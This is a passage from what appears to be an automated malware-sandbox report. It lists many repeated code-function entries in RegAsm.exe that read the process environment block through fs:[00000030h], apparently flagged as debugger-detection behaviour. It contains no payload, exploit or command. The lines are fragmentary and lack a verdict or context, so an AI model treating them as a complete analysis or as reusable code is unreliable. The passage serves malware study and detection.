                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04260 mov eax, dword ptr fs:[00000030h]5_2_02D04260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF823B mov eax, dword ptr fs:[00000030h]5_2_02CF823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE3DB mov eax, dword ptr fs:[00000030h]5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE3DB mov eax, dword ptr fs:[00000030h]5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE3DB mov ecx, dword ptr fs:[00000030h]5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE3DB mov eax, dword ptr fs:[00000030h]5_2_02DAE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA43D4 mov eax, dword ptr fs:[00000030h]5_2_02DA43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA43D4 mov eax, dword ptr fs:[00000030h]5_2_02DA43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A3C0 mov eax, dword ptr fs:[00000030h]5_2_02D0A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D083C0 mov eax, dword ptr fs:[00000030h]5_2_02D083C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D083C0 mov eax, dword ptr fs:[00000030h]5_2_02D083C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D083C0 mov eax, dword ptr fs:[00000030h]5_2_02D083C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D083C0 mov eax, dword ptr fs:[00000030h]5_2_02D083C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBC3CD mov eax, dword ptr fs:[00000030h]5_2_02DBC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D863C0 mov eax, dword ptr fs:[00000030h]5_2_02D863C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E3F0 mov eax, dword ptr fs:[00000030h]5_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E3F0 mov eax, dword ptr fs:[00000030h]5_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E3F0 mov eax, dword ptr fs:[00000030h]5_2_02D1E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D363FF mov eax, dword ptr fs:[00000030h]5_2_02D363FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D103E9 mov eax, dword ptr fs:[00000030h]5_2_02D103E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE388 mov eax, dword ptr fs:[00000030h]5_2_02CFE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE388 mov eax, dword ptr fs:[00000030h]5_2_02CFE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFE388 mov eax, dword ptr fs:[00000030h]5_2_02CFE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF8397 mov eax, dword ptr fs:[00000030h]5_2_02CF8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF8397 mov eax, dword ptr fs:[00000030h]5_2_02CF8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF8397 mov eax, dword ptr fs:[00000030h]5_2_02CF8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2438F mov eax, dword ptr fs:[00000030h]5_2_02D2438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2438F mov eax, dword ptr fs:[00000030h]5_2_02D2438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov ecx, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8035C mov eax, dword ptr fs:[00000030h]5_2_02D8035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA8350 mov ecx, dword ptr fs:[00000030h]5_2_02DA8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DCA352 mov eax, dword ptr fs:[00000030h]5_2_02DCA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D82349 mov eax, dword ptr fs:[00000030h]5_2_02D82349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD634F mov eax, dword ptr fs:[00000030h]5_2_02DD634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA437C mov eax, dword ptr fs:[00000030h]5_2_02DA437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D20310 mov ecx, dword ptr fs:[00000030h]5_2_02D20310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A30B mov eax, dword ptr fs:[00000030h]5_2_02D3A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A30B mov eax, dword ptr fs:[00000030h]5_2_02D3A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A30B mov eax, dword ptr fs:[00000030h]5_2_02D3A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC310 mov ecx, dword ptr fs:[00000030h]5_2_02CFC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD8324 mov eax, dword ptr fs:[00000030h]5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD8324 mov ecx, dword ptr fs:[00000030h]5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD8324 mov eax, dword ptr fs:[00000030h]5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD8324 mov eax, dword ptr fs:[00000030h]5_2_02DD8324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D820DE mov eax, dword ptr fs:[00000030h]5_2_02D820DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D420F0 mov ecx, dword ptr fs:[00000030h]5_2_02D420F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA0E3 mov ecx, dword ptr fs:[00000030h]5_2_02CFA0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D860E0 mov eax, dword ptr fs:[00000030h]5_2_02D860E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D080E9 mov eax, dword ptr fs:[00000030h]5_2_02D080E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC0F0 mov eax, dword ptr fs:[00000030h]5_2_02CFC0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0208A mov eax, dword ptr fs:[00000030h]5_2_02D0208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC60B8 mov eax, dword ptr fs:[00000030h]5_2_02DC60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC60B8 mov ecx, dword ptr fs:[00000030h]5_2_02DC60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF80A0 mov eax, dword ptr fs:[00000030h]5_2_02CF80A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D980A8 mov eax, dword ptr fs:[00000030h]5_2_02D980A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D02050 mov eax, dword ptr fs:[00000030h]5_2_02D02050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D86050 mov eax, dword ptr fs:[00000030h]5_2_02D86050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D2C073 mov eax, dword ptr fs:[00000030h]5_2_02D2C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E016 mov eax, dword ptr fs:[00000030h]5_2_02D1E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E016 mov eax, dword ptr fs:[00000030h]5_2_02D1E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E016 mov eax, dword ptr fs:[00000030h]5_2_02D1E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1E016 mov eax, dword ptr fs:[00000030h]5_2_02D1E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D84000 mov ecx, dword ptr fs:[00000030h]5_2_02D84000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA2000 mov eax, dword ptr fs:[00000030h]5_2_02DA2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D96030 mov eax, dword ptr fs:[00000030h]5_2_02D96030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA020 mov eax, dword ptr fs:[00000030h]5_2_02CFA020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC020 mov eax, dword ptr fs:[00000030h]5_2_02CFC020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h]5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h]5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E1D0 mov ecx, dword ptr fs:[00000030h]5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h]5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E1D0 mov eax, dword ptr fs:[00000030h]5_2_02D7E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC61C3 mov eax, dword ptr fs:[00000030h]5_2_02DC61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC61C3 mov eax, dword ptr fs:[00000030h]5_2_02DC61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D301F8 mov eax, dword ptr fs:[00000030h]5_2_02D301F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD61E5 mov eax, dword ptr fs:[00000030h]5_2_02DD61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h]5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h]5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h]5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D8019F mov eax, dword ptr fs:[00000030h]5_2_02D8019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D40185 mov eax, dword ptr fs:[00000030h]5_2_02D40185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBC188 mov eax, dword ptr fs:[00000030h]5_2_02DBC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBC188 mov eax, dword ptr fs:[00000030h]5_2_02DBC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA197 mov eax, dword ptr fs:[00000030h]5_2_02CFA197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4180 mov eax, dword ptr fs:[00000030h]5_2_02DA4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DA4180 mov eax, dword ptr fs:[00000030h]5_2_02DA4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D98158 mov eax, dword ptr fs:[00000030h]5_2_02D98158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06154 mov eax, dword ptr fs:[00000030h]5_2_02D06154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06154 mov eax, dword ptr fs:[00000030h]5_2_02D06154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFC156 mov eax, dword ptr fs:[00000030h]5_2_02CFC156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov ecx, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D94144 mov eax, dword ptr fs:[00000030h]5_2_02D94144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4164 mov eax, dword ptr fs:[00000030h]5_2_02DD4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD4164 mov eax, dword ptr fs:[00000030h]5_2_02DD4164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov ecx, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAA118 mov eax, dword ptr fs:[00000030h]5_2_02DAA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC0115 mov eax, dword ptr fs:[00000030h]5_2_02DC0115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov eax, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DAE10E mov ecx, dword ptr fs:[00000030h]5_2_02DAE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D30124 mov eax, dword ptr fs:[00000030h]5_2_02D30124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A6C7 mov ebx, dword ptr fs:[00000030h]5_2_02D3A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A6C7 mov eax, dword ptr fs:[00000030h]5_2_02D3A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D7E6F2 mov eax, dword ptr fs:[00000030h]5_2_02D7E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D806F1 mov eax, dword ptr fs:[00000030h]5_2_02D806F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D806F1 mov eax, dword ptr fs:[00000030h]5_2_02D806F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04690 mov eax, dword ptr fs:[00000030h]5_2_02D04690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04690 mov eax, dword ptr fs:[00000030h]5_2_02D04690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D366B0 mov eax, dword ptr fs:[00000030h]5_2_02D366B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3C6A6 mov eax, dword ptr fs:[00000030h]5_2_02D3C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1C640 mov eax, dword ptr fs:[00000030h]5_2_02D1C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D32674 mov eax, dword ptr fs:[00000030h]5_2_02D32674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC866E mov eax, dword ptr fs:[00000030h]5_2_02DC866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DC866E mov eax, dword ptr fs:[00000030h]5_2_02DC866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A660 mov eax, dword ptr fs:[00000030h]5_2_02D3A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3A660 mov eax, dword ptr fs:[00000030h]5_2_02D3A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42619 mov eax, dword ptr fs:[00000030h]5_2_02D42619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D1260B mov eax, dword ptr fs:[00000030h]5_2_02D1260B
